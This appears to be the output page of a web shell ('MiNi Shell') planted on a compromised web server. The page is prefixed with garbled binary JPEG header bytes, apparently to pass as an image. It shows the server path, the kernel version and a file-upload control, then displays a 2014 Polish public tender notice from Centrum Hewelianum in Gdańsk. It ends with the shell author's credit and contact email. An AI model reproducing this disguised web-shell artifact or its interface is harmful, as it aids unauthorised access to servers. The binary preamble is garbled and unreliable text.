JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140404/115038-N-2014.html

<p class="kh_header"><b>Gdańsk: Wykonanie studium techniczno-ekonomiczno-środowiskowego dla zadania pn. Kompleksowy system zarzadzania energią w Centrum Hewelianum oraz zasilania obiektów ze źródeł odnawialnych, finansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007 - 2013</b><br>
<b>Numer ogłoszenia: 115038 - 2014; data zamieszczenia: 04.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Centrum Hewelianum" Jednostka Budżetowa Gminy Miasta Gdańsk , ul. Gradowa 6, 80-802 Gdańsk, woj. pomorskie, tel. 58 300 08 42, faks 58 742 15 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hewelianum.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie studium techniczno-ekonomiczno-środowiskowego dla zadania pn. Kompleksowy system zarzadzania energią w Centrum Hewelianum oraz zasilania obiektów ze źródeł odnawialnych, finansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007 - 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie studium techniczno-ekonomiczno-środowiskowego dla zadania pn. Kompleksowy system zarządzania energią w Centrum Hewelianum oraz zasilania obiektów ze źródeł odnawialnych, finansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007 - 2013. 
Przedmiot zamówienia obejmuje swym zakresem teren Centrum Hewelianum stanowiący kompleks edukacyjno-rekreacyjny położony w centrum miasta Gdańska. Na terenie o powierzchni ok. 21 ha, pełniącym funkcję otwartego parku miejskiego, znajduje się ok. 40 rozproszonych obiektów pomilitarnych (większość z nich powstała w II połowie XIX w.), sukcesywnie adaptowanych dla potrzeb Centrum. W adaptowanych już obiektach wykonano lokalne kotłownie, oparte w dużym stopniu na energii odnawialnej, powstały także pierwsze elementy systemu ogniw fotowoltaicznych. Na rozległym terenie parkowym funkcjonuje instalacja oświetleniowa, rozbudowywana o kolejne odcinki, na których zaczęto instalować lampy ledowe. W pewnym oddaleniu od kompleksu znajduje się Zespół Szpitala Bożego Ciała, obejmujący zabytkowe budynki pełniące obecnie funkcję mieszkalną i planowane do przyszłego włączenia strukturę Centrum Hewelianum, a ich lokalizację określa załącznik nr 2 do OPZ. Szczegółowy wykaz obiektów oraz instalacji zawiera załącznik nr 1 do OPZ.
Obecnie w zrewitalizowanych obiektach Centrum Hewelianum funkcjonują następujące typy urządzeń wykorzystujących energię odnawialną:
- systemy fotowoltaiczne
- pompy ciepła
- systemy rekuperacji

Zakres przedmiotu zamówienia obejmuje:
A.	Wykonanie inwentaryzacji energetycznej obiektów i instalacji zarówno odbiorczych jak i wytwórczych zgodnie z zaleceniami ISO 50001 (pkt 4.4.3 - Przegląd energetyczny)
B.	Wykonanie wariantowej analizy uwarunkowań oraz opracowanie wytycznych (lokalizacyjnych, technicznych oraz ekonomicznych) dla systemu zarządzania zasobami energetycznymi pozyskanymi z nowych źródeł zasilania wykorzystujących OZE i ze źródeł istniejących
C.	Wykonanie wariantowej analizy zwiększenia efektywności energetycznej Centrum Hewelianum w zakresie modernizacji istniejących odbiorów i/lub przyłączenia istniejących odbiorów do systemu monitorowania mediów
D.	Opracowanie zakresu rzeczowego oraz finansowego przedsięwzięcia
E.	Wyliczenie efektywności ekonomicznej przedsięwzięcia
F.	Sformułowanie wniosków ze wskazaniem optymalnych rozwiązań
G.	Sporządzenie wytycznych dla systemu zarządzania energią

Szczegółowy zakres przedmiotu zamówienia:
A)	Inwentaryzacja energetyczna obiektów oraz instalacji odbiorczych i wytwórczych.
Inwentaryzację należy przeprowadzić dla każdego z obiektów znajdujących się w wykazie z osobna oraz potwierdzić protokołem inwentaryzacji zawierającym:
1)	zestawienie zapotrzebowania na każdy, występujący w danym obiekcie rodzaj energii (elektryczna, cieplna, chłodu w ujęciu rocznym, z podziałem co najmniej na sezony letni i zimowy, z uśrednieniem dobowym)
2)	zestawienie odbiorników lub grup odbiorników (w przypadku stosunkowo niewielkiego jednostkowego zużycia energii w ogólnym bilansie obiektu, np. świetlówka t8) na podstawie odczytu tablic znamionowych, wytypowanie odbiorników zużywających stosunkowo najwięcej energii
3)	zestawienie urządzeń przetwarzających media w energię z uwzględnieniem mocy, typu oraz sprawności
4)	zestawienie zużycia mediów (energia elektryczna, gaz, ciepło systemowe i in.) na podstawie odczytów liczników lub na podstawie wyliczeń
5)	analizę zakupów usług energetycznych
6)	analizę i ocenę jakości energii wg EN 50160 i IEC 61000-2-2
7)	ujawnienie nieefektywności energetycznych występujących w obiekcie
8)	analizę możliwości technicznych wykorzystania technologii OZE
9)	szacunkowe zapotrzebowanie na energię obiektów przeznaczonych do adaptacji, nieposiadających obecnie instalacji odbiorczych
Po zakończeniu prac inwentaryzacyjnych należy zebrać dane z protokołów cząstkowych w jeden arkusz zbiorczy przedstawiający aktualny bilans energetyczny dla Centrum Hewelianum. 
Wykaz obiektów podlegających inwentaryzacji znajduje się w załączniku nr 1 do OPZ.
B)	Wariantowa analiza uwarunkowań oraz wytyczne dla systemu zarządzania zasobami energetycznymi pozyskanymi z nowych źródeł zasilania wykorzystujących OZE i ze źródeł istniejących
Na podstawie protokołów inwentaryzacji należy przeprowadzić analizę uwarunkowań:
1)	lokalizacyjnych  - określających miejsca, w których możliwa będzie budowa nowych mocy wytwórczych, instalacja nowych lub modernizacja istniejących urządzeń energetycznych;
2)	technicznych - określających techniczne możliwości budowy nowych mocy wytwórczych lub modernizacji istniejących urządzeń i instalacji; np. nośność budynków, możliwość wentylacji/odprowadzania spalin, stan pozostałych instalacji i urządzeń;
3)	ekonomicznych - określających wskaźnikową ekonomiczną efektywność inwestycji; 
Należy sporządzić zestaw wytycznych dla nowych źródeł i instalacji, które umożliwią integrację proponowanych rozwiązań z systemem zarządzania energii. Wytyczne powinny przede wszystkim określać:
1)	sposoby sterowania systemami wytwórczymi OZE
2)	wykorzystanie automatyki sterującej odbiorami w obiektach
3)	sposoby komunikacji i raportowania do systemów zarządzania energią i monitorowania mediów
4)	procedury i harmonogramy wdrażania kolejnych etapów inwestycji w nowe źródła
5)	metody integracji z istniejącymi systemami zarządzania i monitorowania wykorzystywanymi w Centrum Hewelianum
C)	Wariantowa analiza zwiększenia efektywności energetycznej Centrum Hewelianum w zakresie modernizacji istniejących odbiorów i/lub przyłączenia istniejących odbiorów do systemu monitorowania mediów:
Na podstawie protokołów inwentaryzacji należy przeprowadzić analizę efektywności energetycznej obiektów oraz systemu oświetlenia zewnętrznego. Należy wskazać obszary, w których występuje nieefektywność energetyczna oraz wskazać rozwiązania w postaci działań, które tę nieefektywność poprawią. Należy wskazać urządzenia, grupy urządzeń i instalacje, które będą pracowały w zintegrowanym systemie monitorowania mediów zgodnie z wytycznymi określonymi w punkcie B) niniejszej instrukcji.
D)	Opracowanie zakresu rzeczowego oraz finansowego przedsięwzięcia
Należy przedstawić zakres rzeczowy i finansowy przedsięwzięcia podzielony na etapy realizacji projektu systemu zarządzania energią. Zakres winien obejmować:
1)	Etap przedwdrożeniowy - faza przygotowania niezbędnej dokumentacji systemu (określenie procedur, studia wykonalności, koncepcje projektowe, projekty budowlane i wykonawcze)
2)	Etap wdrożenia systemów -  wyposażenie i modernizacja istniejącej oraz budowa nowej infrastruktury energetycznej (nowe źródła wytwórcze, modernizacja urządzeń odbiorczych,) oraz fizycznych elementów systemu zarządzania energią (opomiarowanie, system elektronicznego zarządzania, komunikacji, raportowania i wizualizacji)
3)	Etap eksploatacji systemów - zestawienie kosztów utrzymania systemów, kosztów osobowych i pozostałych (opłaty, koncesje itp.)
E)	Wyliczenie efektywności ekonomicznej przedsięwzięcia
Na podstawie uprzednio wykonanych analiz i opracowań należy wyliczyć efektywność ekonomiczną przedsięwzięcia w oparciu o metodę analizy kosztów i korzyści oraz oszacować okresy zwrotu nakładów inwestycyjnych na poszczególne elementy systemu.
F)	Sformułowanie wniosków ze wskazaniem optymalnych rozwiązań 
G)	Sporządzenie wytycznych dla systemu zarządzania energią zgodnego z ISO 50001
Dodatkowo zamawiający wymaga, aby do opracowania wykonawca umieścił w dokumentacji załączniki zawierające zbiory tabel, rysunków, wykresów i map wykorzystanych lub stworzonych na potrzeby wykonania przedmiotu zamówienia.


Wymagania dotyczące realizacji przedmiotu zamówienia.
Przedmiot zamówienia powinien zostać zrealizowany zgodnie z powszechnie obowiązującymi przepisami prawa i polskimi normami oraz zasadami wiedzy technicznej przy użyciu sprzętu pomiarowego (dot. inwentaryzacji) umożliwiającego pomiary w pełni zgodne ze wskazanymi normami. Wykonawca będzie w szczególności zobowiązany do:

1)	Prowadzenia prac inwentaryzacyjnych, w szczególności pomiarów prowadzonych na działających urządzeniach i instalacjach, zgodnie z przepisami BHP oraz p. poż.; 
2)	Skompletowania wszystkich wyników badań, pomiarów, świadectw jakości, certyfikatów przed przekazaniem opracowania do odbioru;
3)	Uzgadniania terminów wejść do budynku z zarządcą nieruchomości;
4)	Przeniesienia na Zamawiającego autorskich praw majątkowych do wykonanych opracowań, zgodnie z warunkami zawartymi w projekcie umowy
5)	Przekazania Zamawiającemu prawidłowo wykonanych, kompletnych opracowań, w formie papierowej - 5 kpl. oraz w formie elektronicznej (zapis w formacie PDF).
6)	Zachowania poufności w zakresie udostępnionych przez zamawiającego danych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9, 71.24.20.00-6, 71.24.40.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje w tym zakresie szczegółowego opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia przez niego działalności jest krótszy - w tym okresie, wykonał należycie co najmniej: 
-1 opracowanie studium wykonalności dla systemu energetycznego wykorzystującego OZE (Odnawialne Źródła Energii) do produkcji energii w co najmniej 10 różnych obiektach wraz z opracowaniem ekonomicznym,
-2 pomiary jakości energii elektrycznej zgodnie z normami EN 50160/IEC 61000-2-2 wraz z analizą i opracowaniem wyników</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje w tym zakresie szczegółowego opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli Wykonawca wykaże, dysponowanie następującymi osobami zdolnymi do wykonania zamówienia:
a)  co najmniej 1 osobą  na stanowisko audytora energetycznego posiadającą:
-kwalifikacje do przeprowadzania audytów efektywności energetycznej w zakresie przewidzianym opisem przedmiotu zamówienia, tj: Zaświadczenie o ukończeniu szkolenia audytora efektywności energetycznej o zakresie programowym obejmującym następujące zagadnienia:
1)	zasady auditingu energetycznego
2)	odnawialne źródła energii
3)	systemy oświetleniowe
4)	układy grzewcze, klimatyzacyjne i wentylacyjne
5)	racjonalizacja użytkowania energii elektrycznej
6)	racjonalizacja działania urządzeń energetycznych
7)	kogeneracja
8)	analiza ekonomiczna
- uprawnienia do przeprowadzania pomiarów instalacji elektrycznych do 1 kV, tj: Ważne świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją sieci, urządzeń i instalacji grupy 1 (do 1 kV) na stanowisku DOZORU lub EKSPLOATACJI wydane przez komisję działająca zgodnie z przepisami rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dn. 23 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzana posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci; 
b)  co najmniej 1 osobą na stanowisko eksperta, posiadającą:
- doświadczenie w zakresie wdrożenia w okresie ostatnich 3 lat przed upływem terminu  składania ofert co najmniej jednego systemu zarządzania energią w obiektach użyteczności publicznej lub przedsiębiorstwie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje w tym zakresie szczegółowego opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca zobowiązany jest wskazać w wykazie jedynie usługi wystarczające dla potwierdzenia spełniania warunku udziału w postępowaniu oraz załączyć dowody, że zostały one wykonane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne wymagane wraz z ofertą oświadczenia i dokumenty:
a.	Formularz ofertowy - załącznik nr 1 do SIWZ.
b.	Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone wg wzoru stanowiącego załącznik nr 2a do SIWZ.
c.	Pełnomocnictwo (jeśli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne zmiany niniejszej umowy, w stosunku do treści złożonej oferty, mogą dotyczyć:
1)	warunków płatności,
2)	terminu realizacji zamówienia,
3)	sposobu realizacji zamówienia
4)	zakresu prac w stopniu nie wykraczającym poza określenie przedmiotu zamówienia zawarte w SIWZ,
5)	zmiany osób uczestniczących w wykonywaniu zamówienia po stronie Wykonawcy i osób nadzorujących wykonanie zamówienia po stronie Zamawiającego,
6)	zmiany podwykonawców
7)	wynagrodzenia wykonawcy, jedynie w przypadku, o którym mowa w ust. 2 pkt. 1, 4, 8 lub pkt.9.
2. Zmiany, o których mowa w ust. 1 mogą być dokonane w przypadku:
1)	zmiany ilości obiektów objętych badaniami i analizami;
2)	braku możliwości dostępu do obiektów objętych przedmiotem umowy;
3)	opóźnienia Zamawiającego w przekazaniu danych wyjściowych koniecznych do wykonania studium;
4)	zlecenia wykonania dodatkowych badań i analiz, które wymagają dodatkowego czasu na wykonanie zamówienia;
5)	wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają wprowadzenie zmian do umowy;
6)	zawieszenia prac przez Zamawiającego;
7)	innych przeszkód uniemożliwiających prowadzenie prac, za które nie odpowiada Wykonawca;
8)	rezygnacji z części prac, jeśli taka rezygnacja będzie wynikała z faktycznych potrzeb wykonania poszczególnych usług w celu prawidłowej realizacji przedmiotu umowy;
9)	ustawowej zmiany stawki podatku od towarów i usług (VAT);
4.	Strona wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.
5.	Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie, w formie aneksu do niniejszej umowy, pod rygorem nieważności takiej zmiany</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.hewelianum.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Hewelianum 
Jednostka Budżetowa 
Gminy Miasta Gdańska
ul. Gradowa 6
80-802 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2014 godzina 11:00, miejsce: Centrum Hewelianum, ul. Gradowa 6, 80-802 Gdańsk, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach projektu Centrum Hewelianum. Budowa kompleksu edukacyjno - rekreacyjnego w Gdańsku. Etap IB, finansowanego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com